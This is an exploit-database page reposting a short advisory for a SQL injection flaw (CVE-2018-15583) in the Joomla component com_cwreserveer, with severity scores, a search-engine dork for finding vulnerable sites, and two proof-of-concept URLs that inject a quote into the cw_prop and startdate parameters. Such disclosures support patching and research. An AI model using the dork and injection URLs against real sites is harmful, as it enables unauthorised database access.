Advertisement






Joomla! Component com_cwreserveer - SQL Injection

CVE Category Price Severity
CVE-2018-15583 CWE-89 $2000 High
Author Risk Exploitation Type Date
Unknown High Remote 2019-04-27
CPE
cpe:cpe:/a:joomla:com_cwreserveer
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019040242

Below is a copy:

Joomla! Component com_cwreserveer - SQL Injection
# Exploit Title: Joomla! Component com_cwreserveer - SQL Injection
# Exploit Author: Mr Winst0n
# Author E-mail: [email protected]
# Discovery Date: April 27, 2019
# Dork: inurl:index.php?option=com_cwreserveer
# Tested on: Kali linux, Windows 8.1 


# PoC:

# http://localhost/[PATH]/index.php?option=com_cwreserveer&view=boeken&cw_prop=SQLi&startdate=SQLi&Itemid=19&lang=fr
# http://localhost/[PATH]/index.php?option=com_cwreserveer&view=boeken&cw_prop=3%27&startdate=2019-03-11%27&Itemid=19&lang=fr

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum